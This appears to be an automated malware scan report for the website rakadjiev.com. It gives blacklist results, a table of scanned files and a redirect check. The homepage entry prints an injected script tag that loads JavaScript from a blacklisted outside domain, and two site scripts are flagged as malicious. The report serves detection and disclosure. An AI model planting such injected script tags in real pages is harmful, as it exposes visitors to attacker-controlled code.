Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=rakadjiev.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://rakadjiev.com/ | 200 OK Content-Length: 1335 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: tropiccinema.com ...[1098 bytes skipped]... cellspacing=0> <tr><td align=center valign=middle> <a href="home.php" onmouseover="roll('rakadjiev', 'rakadjievon.jpg', '', '')" onmouseout="roll('rakadjiev', 'rakadjiev.jpg', '', '')"> <img src="rakadjiev.jpg" name="rakadjiev" border=0 valign=middle alt="Click to enter"></a></center> </td></tr> </table> </body> </html><script src="http://tropiccinema.com/info/wYyAVqhd.php?id=29855653" type="text/javascript"></script> ?> | ||
http://rakadjiev.com/onmouseover.js | 200 OK Content-Length: 6765 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) image1 = new Image(); image1.src = "rakadjiev.jpg"; image2 = new Image(); image2.src = "rakadjievon.jpg"; image3 = new Image(); image3.src = "logo.jpg"; image4 = new Image(); image4.src = "logoon.jpg"; image5 = new Image(); image5.src = "mixes.jpg"; image6 = new Image(); image6.src = "mixeson.jpg"; image7 = new Image(); image7.src = "right.jpg"; image8 = new Image(); image8.src = "righton.jpg"; function roll(img_name1, img_src1, img Antivirus reports:
| ||
http://rakadjiev.com/wmplayer.js | 200 OK Content-Length: 7196 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var isIE = navigator.appName.toLowerCase().indexOf('internet explorer') 1; Player = function(id) { this.id = id; this.o = this.getPlayer(); } Player.prototype.getPlayer = function() { var idstr = (isIE) ? this.id "_ie" : this.id "_moz"; var p = document.getElementById(idstr); return p; } Player.prototype.setVariable = function(name, value) { this.o.SetVariable(name, value); } Player.prototype.getVariable = function(name) { return Antivirus reports:
| ||
http://tropiccinema.com/info/wYyAVqhd.php?id=29855653 | 404 Not Found Content-Length: 653 Content-Type: text/html | clean |
http://cdn.dsultra.com/js/registrar.js | 200 OK Content-Length: 1652 Content-Type: application/x-javascript | clean |
http://tropiccinema.com/test404page.js | 404 Not Found Content-Length: 653 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: rakadjiev.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 13 Oct 2014 09:04:28 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
GET / HTTP/1.1
Host: rakadjiev.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 13 Oct 2014 09:04:28 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: rakadjiev.com
Referer: http://www.google.com/search?q=rakadjiev.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: rakadjiev.com
Referer: http://www.google.com/search?q=rakadjiev.com
Result:
The result is similar to the first query. There are no suspicious redirects found.